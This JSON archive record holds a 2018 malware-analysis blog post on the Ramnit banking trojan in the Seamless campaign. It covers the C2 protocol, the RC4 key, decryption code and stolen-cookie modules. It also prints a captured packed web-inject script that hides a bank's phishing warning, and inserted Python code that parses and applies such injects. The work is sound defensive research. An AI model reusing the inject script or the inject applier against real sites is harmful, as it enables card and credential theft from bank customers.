{
	"id": "000abf68-e261-415a-98c8-f24fdf7d6b8c",
	"created_at": "2026-04-06T00:10:36.548096Z",
	"updated_at": "2026-04-10T03:21:16.486864Z",
	"deleted_at": null,
	"sha1_hash": "f66604ee8c5fbbb562722e93add46a9af001b520",
	"title": "nao-sec.org",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 212555,
	"plain_text": "nao-sec.org\r\nBy 友利奈緒\r\nPublished: 2018-01-01 · Archived: 2026-04-05 19:40:10 UTC\r\nAnalyzing Ramnit used in Seamless campaign\r\n2018-01-01\r\nFirst\r\nThe Seamless campaign, a drive-by download campaign, delivers the Ramnit banking trojan. Many articles about the Seamless campaign have been published, for example by Cisco Umbrella, Malware-Traffic-Analysis and traffic.moe. Seamless has delivered Ramnit since it was first observed. Once run, Ramnit injects code into web pages to steal information such as credit card numbers. Ramnit is a previously reported banking trojan, but I didn't know much about it, so I investigated it.\r\nSeamless Campaign Traffic\r\nFirst, about the Seamless campaign. It consists of the following traffic.\r\nWhen a user reaches Seamless's Pre-Gate from the ad network, the Pre-Gate reads the user's time zone and sends it to the server. If the user is in a targeted time zone, the Pre-Gate redirects the user to the Gate via several redirectors. At the Gate the user loads the landing page of the RIG Exploit Kit, which exploits the browser and delivers Ramnit.\r\nSeamless is sensitive to the user's geolocation. A Pre-Gate exists for each target country: for example, the Pre-Gate for the USA redirects to the Gate for the USA, and the Ramnit build for the USA is delivered.\r\nRamnit Traffic\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 1 of 12\n\nRamnit uses its own protocol when communicating with C2. Following this protocol, I extract the configs and modules from the traffic between Ramnit and C2.\r\nThe protocol uses port 443, but it is not HTTPS: it is a simple framing over plain TCP. A packet consists of one or more commands with their data. The structure is as follows.\r\n00 ff magic number byte[2]\r\n06 00 00 00 length dword\r\ne2 command byte\r\n01 00 00 00 00 data byte[length-1]\r\nThe magic number is a fixed value; every packet starts with these two bytes. length is a little-endian dword giving the length of the command plus the data, in other words strlen(command + data). command is 1 byte, and there are various kinds:\r\n0x01 COMMAND_OK\r\n0x11 GET_DNSCHANGER\r\n0x13 GET_INJECTS\r\n0x15 UPLOAD_COOKIES\r\n0x21 GET_MODULE\r\n0x23 GET_MODULE_LIST\r\n0x51 VERIFY_HOST\r\n0xe2 REGISTER_BOT\r\n0xe8 UPLOAD_INFO_GET_COMMANDS\r\nData has three structures, selected by its first byte:\r\nchunk_0:\r\n00 magic number byte\r\n06 00 00 00 length dword\r\n01 23 45 67 89 01 RC4 encrypted data byte[length]\r\n---\r\nchunk_1:\r\n01 magic number byte\r\n00 01 00 00 data dword\r\n---\r\nchunk_2:\r\n02 magic number byte\r\n00 01 00 00 data dword\r\n00 02 00 00 data dword\r\nThe RC4 key appears to be fixed. In my environment `fenquyidh` is the key.\r\nLet's look at the data using actual traffic. If you have Ramnit traffic, use it. If not, find a Ramnit sample and run it, or look for a pcap. For example, the #Ramnit tag on Twitter has many tweets, and you will surely find a sample or its traffic there.\r\nRamnit is a banking trojan, and its behaviour depends on the target country/region. For example, the Ramnit used in the campaign targeting Japan does not work from IP addresses outside Japan, and the configs and modules it fetches from C2 change with the target as well. This time, let's look at the traffic of Ramnit for Japan. If you cannot get traffic of Ramnit for Japan, refer to this link. It seems that someone kindly released a pcap ;)\r\nhttps://gist.github.com/anonymous/2d7eef0c0ffba19338afd74823d7a8c9\r\nLet's open the pcap and look at the first packet.\r\n00ff4b000000e200200000000c361ffe44bc3561c50723482c1e8ccca72b6a4c\r\n161459f31cc70559b27aed4d00200000000d371cad11b93131c652704c7d1589\r\nc5a22c6f4b104758f614c2500de67cbf16\r\nParsing this according to the protocol gives the following.\r\n// magic number\r\n00 ff\r\n// length (0x4b = 75: the command byte plus two 37-byte chunks)\r\n4b 00 00 00\r\n// command =\u003e REGISTER_BOT (send two MD5s)\r\ne2\r\n// data chunk magic (RC4 chunk)\r\n00\r\n// data length\r\n20 00 00 00\r\n// data\r\n0c 36 1f fe 44 bc 35 61 c5 07 23 48 2c 1e 8c cc\r\na7 2b 6a 4c 16 14 59 f3 1c c7 05 59 b2 7a ed 4d\r\n// data chunk magic (RC4 chunk)\r\n00\r\n// data length\r\n20 00 00 00\r\n// data\r\n0d 37 1c ad 11 b9 31 31 c6 52 70 4c 7d 15 89 c5\r\na2 2c 6f 4b 10 47 58 f6 14 c2 50 0d e6 7c bf 16\r\nThis data is RC4-encrypted, so the next step is to decrypt it. 
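The parse above, carried out in code. The following Python is an added example, not the post's code and not the author's PHP script that follows: it frames a client-to-C2 stream into packets, walks the data chunks, and decrypts the RC4 chunks. It assumes the fixed RC4 key the post reports (fenquyidh) and the chunk layouts from the protocol section; the command names are the author's labels. It also includes a small check a network defender can apply to 443/tcp payloads that are not TLS.

```python
import struct

# Added example (not code from the original post): a parser for the Ramnit
# C2 framing described above, plus RC4 to decrypt the encrypted data chunks.
# The packet bytes below are the first REGISTER_BOT packet quoted from the
# post's pcap; the RC4 key is the one the post reports for its sample.

MAGIC = bytes([0x00, 0xff])
RC4_KEY = b'fenquyidh'

COMMANDS = {
    0x01: 'COMMAND_OK',
    0x11: 'GET_DNSCHANGER',
    0x13: 'GET_INJECTS',
    0x15: 'UPLOAD_COOKIES',
    0x21: 'GET_MODULE',
    0x23: 'GET_MODULE_LIST',
    0x51: 'VERIFY_HOST',
    0xe2: 'REGISTER_BOT',
    0xe8: 'UPLOAD_INFO_GET_COMMANDS',
}


def rc4(key, data):
    # Plain RC4: key scheduling (KSA) followed by the keystream generator
    # (PRGA) XORed over the data. Encryption and decryption are the same op.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def parse_chunks(body):
    # Chunk kinds from the post: 0x00 = dword length + RC4 data,
    # 0x01 = one dword, 0x02 = two dwords. Every RC4 chunk is decrypted with
    # a fresh keystream, which is what the post's per-chunk decryption does.
    chunks = []
    pos = 0
    while pos < len(body):
        kind = body[pos]
        if kind == 0x00:
            (n,) = struct.unpack_from('<I', body, pos + 1)
            raw = body[pos + 5:pos + 5 + n]
            if len(raw) != n:
                raise ValueError('truncated RC4 chunk')
            chunks.append(('rc4', rc4(RC4_KEY, raw)))
            pos += 5 + n
        elif kind == 0x01:
            chunks.append(('dword', struct.unpack_from('<I', body, pos + 1)[0]))
            pos += 5
        elif kind == 0x02:
            chunks.append(('dwords', struct.unpack_from('<II', body, pos + 1)))
            pos += 9
        else:
            raise ValueError('unknown chunk type 0x%02x' % kind)
    return chunks


def parse_stream(stream):
    # One TCP payload may carry several packets back to back; walk them all.
    # length counts the command byte plus its data, so the data is length-1.
    packets = []
    pos = 0
    while pos < len(stream):
        if stream[pos:pos + 2] != MAGIC:
            raise ValueError('bad magic at offset %d' % pos)
        (length,) = struct.unpack_from('<I', stream, pos + 2)
        end = pos + 6 + length
        if length < 1 or end > len(stream):
            raise ValueError('truncated packet at offset %d' % pos)
        cmd = stream[pos + 6]
        packets.append({
            'command': cmd,
            'name': COMMANDS.get(cmd, 'UNKNOWN'),
            'chunks': parse_chunks(stream[pos + 7:end]),
        })
        pos = end
    return packets


def looks_like_ramnit(payload):
    # Detection hint: a client payload on 443/tcp that starts with 00 ff and a
    # self-consistent length instead of a TLS record (16 03 ..) is suspect.
    if len(payload) < 7 or payload[:2] != MAGIC:
        return False
    (length,) = struct.unpack_from('<I', payload, 2)
    return 1 <= length <= len(payload) - 6


# First client packet from the post (REGISTER_BOT with two RC4 chunks).
FIRST_PACKET = bytes.fromhex(
    '00ff4b000000e200200000000c361ffe44bc3561c50723482c1e8ccca72b6a4c'
    '161459f31cc70559b27aed4d00200000000d371cad11b93131c652704c7d1589'
    'c5a22c6f4b104758f614c2500de67cbf16')

if __name__ == '__main__':
    for pkt in parse_stream(FIRST_PACKET):
        print(pkt['name'], [v for _, v in pkt['chunks']])
```

Run it over a reassembled client-to-C2 TCP stream (for example the 443/tcp payloads tshark extracts), not over single frames, because one segment can carry several framed commands and a chunk can straddle a frame boundary.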
RC4 is a simple algorithm, so I wrote the decryption code myself.\r\n\u003c?php\r\nclass RC4\r\n{\r\n    // RC4 is symmetric: the same routine encrypts and decrypts.\r\n    public static function calc(string $data, string $key) : string\r\n    {\r\n        // Key-scheduling algorithm (KSA): permute the 256-byte state with the key.\r\n        $s = [];\r\n        for($i = 0; $i \u003c 256; $i++)\r\n        {\r\n            $s[$i] = $i;\r\n        }\r\n        $j = 0;\r\n        for($i = 0; $i \u003c 256; $i++)\r\n        {\r\n            $j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;\r\n            list($s[$i], $s[$j]) = [$s[$j], $s[$i]];\r\n        }\r\n        // Pseudo-random generation (PRGA): XOR each data byte with a keystream byte.\r\n        $i = $j = 0;\r\n        $ret = '';\r\n        for($k = 0; $k \u003c strlen($data); $k++)\r\n        {\r\n            $i = ($i + 1) % 256;\r\n            $j = ($j + $s[$i]) % 256;\r\n            list($s[$i], $s[$j]) = [$s[$j], $s[$i]];\r\n            $ret .= $data[$k] ^ chr($s[($s[$i] + $s[$j]) % 256]);\r\n        }\r\n        return $ret;\r\n    }\r\n}\r\n$key = 'fenquyidh';\r\n// The two 32-byte RC4 chunks from the first packet, as hex bytes.\r\n$binary1 = [\r\n    '0c', '36', '1f', 'fe', '44', 'bc', '35', '61',\r\n    'c5', '07', '23', '48', '2c', '1e', '8c', 'cc',\r\n    'a7', '2b', '6a', '4c', '16', '14', '59', 'f3',\r\n    '1c', 'c7', '05', '59', 'b2', '7a', 'ed', '4d'\r\n];\r\n$binary2 = [\r\n    '0d', '37', '1c', 'ad', '11', 'b9', '31', '31',\r\n    'c6', '52', '70', '4c', '7d', '15', '89', 'c5',\r\n    'a2', '2c', '6f', '4b', '10', '47', '58', 'f6',\r\n    '14', 'c2', '50', '0d', 'e6', '7c', 'bf', '16'\r\n];\r\n// Convert the hex list to a binary string, then decrypt each chunk separately.\r\n$data1 = [];\r\nfor($i=0; $i\u003ccount($binary1); $i++)\r\n{\r\n    $data1[] = chr(hexdec($binary1[$i]));\r\n}\r\n$data1 = implode('', $data1);\r\n$data1 = RC4::calc($data1, $key);\r\nvar_dump($data1);\r\n$data2 = [];\r\nfor($i=0; $i\u003ccount($binary2); $i++)\r\n{\r\n    $data2[] = chr(hexdec($binary2[$i]));\r\n}\r\n$data2 = implode('', $data2);\r\n$data2 = RC4::calc($data2, $key);\r\nvar_dump($data2);\r\nThe results are as follows. Ramnit sends two MD5 values to C2; this is how the bot registers itself.\r\nstring(32) \"d5ad437b032fd239616c1d0d97a6b6eb\"\r\nstring(32) \"e4b7a6323fab5960363d771a124b6079\"\r\nThe following script automates this process.\r\nhttps://github.com/nao-sec/ramnit_traffic_parser\r\nThe script uses tshark. If it is not installed, install it and add it to your PATH. Now, let's run the script.\r\n$ php main.php ramnit_traffic.pcap\r\n[+] REGISTER_BOT(0xe2) : output/000_e2.bin\r\n[+] REGISTER_BOT(0xe2) : output/001_e2.bin\r\n[+] REGISTER_BOT(0xe2) : output/002_e2.bin\r\n-- snip --\r\n[+] GET_INJECTS(0x13) : output/139_13.bin\r\n[+] REGISTER_BOT(0xe2) : output/140_e2.bin\r\n[+] REGISTER_BOT(0xe2) : output/141_e2.bin\r\nFiles are created in the output directory. Let's look at `064_21.bin`.\r\nThis file begins with the text \"Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)\". An MZ header follows at offset 0x120, so a PE file is embedded. Cutting out everything from 0x120 onwards gives the following.\r\n$ file 064_21.bin\r\n064_21.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed\r\nIt is packed with UPX, so unpack it.\r\n$ upx -d 064_21.bin\r\n$ file 064_21.bin\r\n064_21.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nLooking at this DLL in IDA, you can see that it is a program that interferes with anti-virus software.\r\nSeveral DLL modules (067_21.bin, 070_21.bin, 073_21.bin) are downloaded in the same way.\r\nNext, let's look at 106_15.bin. This file is a zip archive, and inside it were IE's cookies. There was also a DLL module that zips cookies, so the two are probably related.\r\n$ file 106_15.bin\r\n106_15.bin: Zip archive data, at least v2.0 to extract\r\n$ unzip -l 106_15.bin\r\nArchive: 106_15.bin\r\nLength Date Time Name\r\n--------- ---------- ----- ----\r\n94 2017-02-25 00:24 IE Cookies/383ZENWY.cookie\r\n0 2017-02-25 00:23 IE Cookies/container.dat\r\n114 2017-12-01 01:09 IE Cookies/DVJZAF70.cookie\r\n63 2017-02-25 00:24 IE Cookies/EB3FDKZ8.cookie\r\n101 2017-11-19 17:25 IE Cookies/EWCKIMK2.cookie\r\n114 2017-02-25 00:30 IE Cookies/Q35837OZ.cookie\r\n156 2017-05-02 20:06 IE Cookies/RTHFNUYR.cookie\r\n--------- -------\r\n642 7 files\r\nFinally, look at 139_13.bin. This is the config for the code injected into web pages: each set_url entry names a URL pattern and the requests to hook (G = GET, P = POST), and data_inject is inserted into the page between the data_before and data_after markers.\r\nset_url [[\"Credit card company URL\"]] GP\r\ndata_before\r\nPC_fishing*\u003c/ul\u003e\r\ndata_end\r\ndata_inject\r\n\u003cscript\u003eeval(function(p,a,c,k,e,r){e=function(c){return(c\u003ca?'':e(parseInt\r\n(c/a)))+((c=c%a)\u003e35?String.fromCharCode(c+29):c.toString(36))};if\r\n(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e)\r\n{return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])\r\np=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('1 4={7:q(a,\r\nb){r s a==\"E\"?a.3(b):/^(F|G|H)$/i.3((s a).t())?a==b:6},u:q(a){r a.I||a.J||\r\na.8||\"\"},x:q(b){1 c=b.y||K;1 d=b.z||\"A\";1 e=6;1 f=6;1 g=[];1 h=c.L(b.v.B()\r\n);w(1 k=0;k\u003ch.9;k++){1 i=0;1 j=0;w(1 l M b){2(!/^(v|z|y|N)$/i.3(l)){j++;2\r\n(/^(8)$/i.3(l)){2(4.7(b[l],h[k].8)){i++}}p 2(/^(u)$/i.3(l)){2(4.7(b[l],4.u\r\n(h[k]))){i++}}p{w(1 a=0;a\u003ch[k].5.9;a++){2(s h[k].5[a].C!=\"O\"){1 m=h[k].5\r\n[a].C.t().B();1 n=h[k].5[a].D?h[k].5[a].D.t():h[k].5[a];2(m==l\u0026\u00264.7(b[l],\r\nn)){i++}}}}}}2(i==j){2(/^(A)$/i.3(d)){e=h[k];P}p 2(/^(Q)$/i.3(d)){f=h[k]}\r\np 2(/^(R)$/i.3(d)){1 o=g.9;g[o]=h[k]}}}r e||f||(g.9\u003e0?g:6)||6}};1 c=4.x(\r\n{\"v\":\"S\",\"8\":/T/U});2(c){c.V.W=\"X\"}',60,60,'|var|if|test|getElement|\r\nattributes|false|equals|innerHTML|length||||||||||||||||else|function|\r\nreturn|typeof|toString|innerContent|tagName|for|byAttrs|parentElement|\r\nsearchType|first|toLowerCase|nodeName|nodeValue|object|string|number|\r\nboolean|textContent|innerText|document|getElementsByTagName|in|\r\ntoJSONString|undefined|break|last|all|li|fishing|im|style|display|\r\nnone'.split('|'),0,{}));\u003c/script\u003e\r\ndata_end\r\ndata_after\r\ndata_end\r\nThe injected script is packed with the usual p,a,c,k,e,r packer; its dictionary already tells the story. Unpacked, the payload looks up the first li element whose innerHTML matches /fishing/im and sets its style.display to none, in other words it hides the site's own phishing warning from the victim.\r\nLooking at this configuration, the URLs of many credit card companies and related companies are present. It is localized for Japan.\r\nRamnit Modules\r\nI analyzed the modules that Ramnit downloads. All modules have extra data prepended to the PE file, and the PE file itself is a DLL packed with UPX. At the beginning of each module there is a comment describing its role. 
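Before the module list, the inject config shown in the previous section in code. It is in the Zeus-style set_url / data_before / data_inject / data_after / data_end format. The Python below is an added example, not code from the post or from Ramnit: it parses that format and applies one entry to a page the way the browser hook would, inserting data_inject immediately after the data_before marker, with * as a wildcard in both markers and URL patterns. The config text, the URL pattern and the HTML page are constructed for the example; the post redacts the real URLs.

```python
import fnmatch

# Added example, not code from the original post or from Ramnit: parser and
# applier for the Zeus-style web-inject config format (set_url /
# data_before / data_inject / data_after / data_end). The config and the
# victim page below are constructed for illustration.

NL = chr(10)
BLOCKS = ('data_before', 'data_inject', 'data_after')


def parse_injects(text):
    # One entry per set_url; each of the three data blocks runs to data_end.
    entries, cur, key, buf = [], None, None, []
    for line in text.splitlines():
        s = line.strip()
        if key is not None:
            if s == 'data_end':
                cur[key] = NL.join(buf)
                key = None
            else:
                buf.append(line)
        elif s.startswith('set_url'):
            parts = s.split()
            # flags: G = hook GET requests, P = hook POST requests (GP = both)
            cur = {'url': parts[1], 'flags': parts[2] if len(parts) > 2 else ''}
            cur.update((b, '') for b in BLOCKS)
            entries.append(cur)
        elif s in BLOCKS:
            if cur is None:
                raise ValueError('%s before set_url' % s)
            key, buf = s, []
    return entries


def url_matches(url, pattern):
    # set_url patterns use * as a wildcard, which fnmatch handles directly.
    return fnmatch.fnmatchcase(url, pattern)


def find_marker(html, marker, start=0):
    # Markers also use * as a wildcard: match the literal pieces in order and
    # return (start, end) of the whole match, or (-1, -1) when absent.
    pos, first = start, None
    for piece in marker.split('*'):
        idx = html.find(piece, pos)
        if idx < 0:
            return -1, -1
        if first is None:
            first = idx
        pos = idx + len(piece)
    return first, pos


def apply_inject(html, entry):
    # Insert data_inject right after data_before; when data_after is given it
    # must follow, so the injection only lands in the expected spot.
    _, end = find_marker(html, entry['data_before'])
    if end < 0:
        return html, False
    if entry['data_after'] and find_marker(html, entry['data_after'], end)[0] < 0:
        return html, False
    return html[:end] + entry['data_inject'] + html[end:], True


# Constructed config in the same format as the post's 139_13.bin.
SAMPLE_CONFIG = '''set_url https://card.example/*/login* GP
data_before
PC_fishing*</ul>
data_end
data_inject
<script>/*injected*/</script>
data_end
data_after
data_end
'''

# Constructed victim page carrying the PC_fishing marker.
SAMPLE_HTML = '<html><body><ul class=PC_fishing><li>a</li></ul><form id=pay></form></body></html>'

if __name__ == '__main__':
    for entry in parse_injects(SAMPLE_CONFIG):
        if url_matches('https://card.example/jp/login?id=1', entry['url']):
            print(apply_inject(SAMPLE_HTML, entry)[0])
```

The same two functions make a quick triage tool for a recovered GET_INJECTS blob: run parse_injects over it and list the set_url patterns to see which sites a given build targets.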
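To carve the DLL out of a downloaded module the way the post does for 064_21.bin (description text first, MZ header at 0x120), here is an added Python example, not the post's code: it finds the PE header by validating e_lfanew instead of trusting a fixed offset, returns the prepended description, and reads the COFF header and section names to confirm the DLL bit and flag UPX section names. The module blob is constructed inline to mimic that layout and is not a real sample; the header values it uses are the standard PE fields.

```python
import struct

# Added example, not code from the original post: carve the PE file out of a
# Ramnit module blob (description text, then the DLL) and read enough of the
# PE headers to confirm it is a DLL and whether its section names show UPX
# packing. The sample blob is constructed to mimic the layout the post
# describes (text, then an MZ header at offset 0x120); it is not a real module.

MZ = b'MZ'
PE_SIG = b'PE' + bytes(2)
DLL_FLAG = 0x2000  # IMAGE_FILE_DLL in COFF Characteristics


def carve_module(blob):
    # Scan every MZ candidate and accept the first whose e_lfanew points at a
    # PE signature inside the blob, so stray MZ bytes in the prepended text
    # are skipped. Returns (prepended_text, pe_bytes).
    start = 0
    while True:
        off = blob.find(MZ, start)
        if off < 0:
            raise ValueError('no PE header found')
        if off + 0x40 <= len(blob):
            (e_lfanew,) = struct.unpack_from('<I', blob, off + 0x3c)
            sig = off + e_lfanew
            # e_lfanew cannot precede the 64-byte DOS header; the upper bound
            # is a sanity limit against ASCII read as an offset.
            if 0x40 <= e_lfanew < 0x10000 and blob[sig:sig + 4] == PE_SIG:
                return blob[:off], blob[off:]
        start = off + 1


def pe_info(pe):
    # The COFF header follows the PE signature; the section table follows the
    # optional header, whose size the COFF header states.
    (e_lfanew,) = struct.unpack_from('<I', pe, 0x3c)
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from('<HHIIIHH', pe, coff)
    table = coff + 20 + opt_size
    names = []
    for k in range(nsec):
        raw = pe[table + 40 * k:table + 40 * k + 8]
        names.append(raw.rstrip(bytes(1)).decode('ascii', 'replace'))
    return {
        'machine': machine,
        'is_dll': bool(chars & DLL_FLAG),
        'sections': names,
        'upx': any(n.startswith('UPX') for n in names),
    }


def module_description(blob):
    # The text before the MZ header, with the zero padding removed.
    text, _ = carve_module(blob)
    return text.rstrip(bytes(1)).decode('ascii', 'replace')


def build_sample_module():
    # Constructed blob (not a real module): description, zero padding up to
    # 0x120, then a minimal DOS header, PE signature, COFF header with the DLL
    # flag and no optional header, and three section headers named like UPX.
    desc = b'Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)'
    dos = bytearray(0x40)
    dos[:2] = MZ
    struct.pack_into('<I', dos, 0x3c, 0x40)
    coff = struct.pack('<HHIIIHH', 0x14c, 3, 0, 0, 0, 0, 0x0102 | DLL_FLAG)
    sections = b''.join(n.ljust(8, bytes(1)) + bytes(32) for n in (b'UPX0', b'UPX1', b'.rsrc'))
    return desc + bytes(0x120 - len(desc)) + bytes(dos) + PE_SIG + coff + sections

if __name__ == '__main__':
    blob = build_sample_module()
    print(module_description(blob))
    print(pe_info(carve_module(blob)[1]))
```

On a real 0x21 blob, write the second element of carve_module to disk and run file and upx -d on it as the post does; the section names from pe_info tell you beforehand whether upx -d has anything to do.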
Most of them match what other analysts have already published.\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nhttp://www.vkremez.com/2017/08/8-10-2017-rig-exploit-kit-leads-to.html\r\nhttps://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/\r\nFor Japan\r\n[module 1]\r\nAvTrust\r\nAntivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)\r\nAdds the bot to the antivirus software's exception list.\r\n[module 2]\r\nCookieGrabber\r\nCookie Grabber v0.2 (no mask)\r\nCompresses the cookies of browsers (Firefox, Chrome, Opera, IE) into a zip and sends it.\r\n[module 3]\r\nHooker\r\nIE \u0026 Chrome \u0026 FF injector\r\n[module 4]\r\nBrowser communication hook\r\nVNC IFSB\r\nVNC IFSB x64-x86\r\nI think it is similar to this code.\r\nhttps://github.com/gbrindisi/malware/blob/master/windows/gozi-isfb/AcDll/activdll.c\r\n[module 5]\r\nFFCH\r\nFF\u0026Chrome reinstall x64-x86 [silent]\r\nFor USA\r\nModules 1 to 4 are the same. Module 5 had the following functions instead.\r\nFtpGrabber2\r\nFtp Grabber v2.0\r\nAnd from a US IP address, AZORult was also downloaded.\r\nhttps://www.hybrid-analysis.com/sample/37b66f9117a2140fa11badad967c09142860d04af9a3564bfe58527d7d7e9270\r\nIOCs\r\nhttps://github.com/nao-sec/ioc/blob/master/nao_sec/5a34bc94-1eb8-4213-9ab8-34dbc0a8010a.json\r\nFinally\r\nRamnit has not changed much for a long time. It is consistent with the analysis Symantec published in 2014.\r\nhttps://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf\r\nThe configuration changes depending on the IP address, but the same modules were downloaded.\r\nRamnit traffic is interesting ;)\r\nSource: http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html"
	],
	"report_names": [
		"analyzing-ramnit-used-in-seamless.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434236,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f66604ee8c5fbbb562722e93add46a9af001b520.pdf",
		"text": "https://archive.orkl.eu/f66604ee8c5fbbb562722e93add46a9af001b520.txt",
		"img": "https://archive.orkl.eu/f66604ee8c5fbbb562722e93add46a9af001b520.jpg"
	}
}